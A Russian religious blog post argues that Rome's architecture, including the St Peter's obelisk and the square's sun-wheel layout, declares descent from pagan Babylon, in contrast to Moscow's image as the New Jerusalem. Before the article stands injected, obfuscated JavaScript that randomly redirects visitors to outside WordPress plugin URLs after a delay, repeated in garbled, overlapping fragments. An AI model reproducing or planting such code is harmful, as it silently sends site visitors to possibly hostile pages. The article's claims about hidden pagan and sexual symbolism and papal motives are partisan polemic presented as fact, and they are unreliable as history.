$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor has-alpha-channel-opacity»/>
В одной из предыдущих статей я говорил о том, как Москва видела, хотела видеть себя — Новым Иерусалимом. Коснулись мы немного и древней архитектуры Москвы, ее символики, значимости. Об этом мы говорили в контексте формирования в русском человеке исторического осознания — кто он? Это осознание выливалось в том числе и в архитектурные образы.
А в этой коротенькой статье-заметке я хотел бы показать, кем и чем в то же самое время стремилась осознать себя католическая Европа. В то время как Русь, посредством архитектуры, делала заявку на то, что она является Новым Иерусалимом – то есть, духовной столицей мира, страной, противостоящей языческому Вавилону, царством христианским, Западный мир, ведомый папством, проходил обратный путь и делал обратные заявления.

Скачать/читать книгу «Римский лабиринт» бесплатно онлайн на сайте «Духовный миллионщик» здесь (PDF)
Архитектурные заявления делались не в форме подражания Иерусалиму, но в форме подражания другому известному городу – Вавилону. К примеру, архитектурные ансамбли Рима – громкая, хотя и безгласная заявка на свою преемственность от Вавилона. Несколько лет назад, работая над своей книгой «Римский лабиринт» (Москва, ЭКСМО, 2012) я заинтересовался символизмом римской архитектуры. На протяжении нескольких лет я исследовал эту тему, и сделал для себя немало удивительных открытий, некоторые из которых и вошли в книгу, и отразились в сюжете.
Подлинное искусство архитектуры состоит в том, чтобы, одновременно и явить нечто, и нечто утаить. Архитектура Рима содержит много тайных символов и знаков. К примеру, широкая прямая улица — Виа делла Кончилиационе — вливающаяся в площадь у собора Святого Петра, вместе с площадью и стоящим посередине нее египетским обелиском, образует одну прямую линию длиной около километра. Улица и площадь находятся на прямом векторе восток–запад. Расскажу немного о них.
Когда в XV и XVI веках планировали постройку собора и новой площади, весь холм уже был застроен дворцами пап и кардиналов, особняками приближенных к ним лиц, конкубанок и детей, храмами и служебными постройками. Кардиналы, входившие в комиссию по строительству, уже тогда настаивали на том, что все здания между Борго Нуово и Борго Веччио должны быть снесены, чтобы ничто не препятствовало лучам солнца на рассвете падать на возведенный здесь обелиск: ведь так было принято в египетских и вавилонских культах.
Но осуществление этого плана требовало больших средств, а церковь в ту пору переживала большой кризис — папы тратили основную часть церковных финансов на то, чтобы окружить себя невиданной роскошью, а также на содержание и устройство своих многочисленных наложниц и детей. Так что план пришлось отложить на четыре столетия. Но план не был забыт.
Заключая в 1929 году Латеранские соглашения, папа Пий XI и Муссолини договорились о том, что будут помогать и поддерживать друг друга. И оба сдержали свое слово. Папа сделал все, чтобы укрепить режим Муссолини, а Муссолини признал в том же году суверенитет Ватикана. 29 октября 1936 года Муссолини приступил (за счет государства и налогов) к осуществлению проекта по сносу целого квартала — он нанес первый символический удар кувалдой.
Ломали целый год — ломали дворцы, среди них знаменитый особняк Борджиа, древние храмы, памятники архитектуры. Для чего? Чтобы первые лучи восходящего солнца сразу же падали на стоящий посреди площади языческий египетский обелиск. Обелиски в древнем мире, с подачи не то языческого Египта, не то языческого Вавилона, ставили перед языческими храмами таким образом, чтобы утром при восходе солнца тень обелиска падала прямо на центральную дверь храма.
Это символизировало половой акт между мужским и женским началами. Такой языческий символизм вряд ли хорошо совмещается с заявками христианства. Если внимательно посмотреть на площадь перед собором Святого Петра можно еще многое заметить. Например, что она как бы прорезана широкими линиями — разделена на секторы. Но это — не солнечные часы. Площадь выполнена в форме так называемого солнечного колеса: с прямыми линиями-спицами, расходящимися из центра. Четыре двойные линии делят ее на восемь секторов — самый базовый, традиционный вариант солнечного колеса.
Солнечное колесо является древним символом солнца. Аполлон катался на колеснице. Ассирийский бог солнца изображался в виде солнечного колеса. Греческий Гелиос всегда восседал в колеснице. Сол Инвиктус — Солнце Непобедимое; Митра изображался скачущим на колеснице на римских монетах. Ведический Сурья, индийский бог солнца, восседал в колеснице, запряженной семеркой лошадей.
В буддизме и индуизме колеса солнца занимают самые видные и почетные места в храмах. Даже египетский бог солнца Атон изображался в форме солнечного колеса. Для язычника вполне естественно поклоняться солнцу.
Культ солнца был распространен и среди наших предков – древних славян. Но в славянском варианте заметны явные попытки «крестить» древние предрассудки, чтобы они стушевались от яркого света христианской веры – подлинного света с Востока. В случае же с Римом, заметна противоположная тенденция – это овавилонивание, оязычивание христианства.
Неудивительно поэтому, что Русь всегда скептически относилась к «Первому Риму» считая его отступившим от основ истинного христианства. Западное христианство шло от Христа к солнцу, в то время как русское христианство шло от солнца к Христу – подлинному свету от Востока. Но, вот, в 1917-ом, оно, преткнувшись, пало. И, наконец, встретилось с Западом — и обогнала его в своем безбожии. Но вот что интересно — Советская Россия быстренько начала вводить такие же архитектурные формы и символы, какими богат Рим: египетскими и вавилонскими. Звезды, пирамиды, стеллы и прочая атрибутика древнего язычества целиком перекочевала в СССР. Но это уже отдельная тема для разговора.
Поделитесь своими мыслями ниже, в комментариях.
Оставить комментарий очень просто. Напишите ваше имя и эл. почту (для получения уведомлений о возможных вам ответах) и делитесь вашими мыслями в комментариях. Регистрация единоразовая.
***
Поддержать служение
«Солёного радио», — сайт, YouTube канал, архив Яндекс Диска, — можно перечислив любую сумму на карту Сбер 4276 6600 1073 3772 (Дмитрий Александрович Б.). В сообщении можно написать просто «СР».
***
Солёное радио в соцсетях
Солёное радио — Telegram, YouTube, ВКонтакте, Яндекс Дзен
No Comments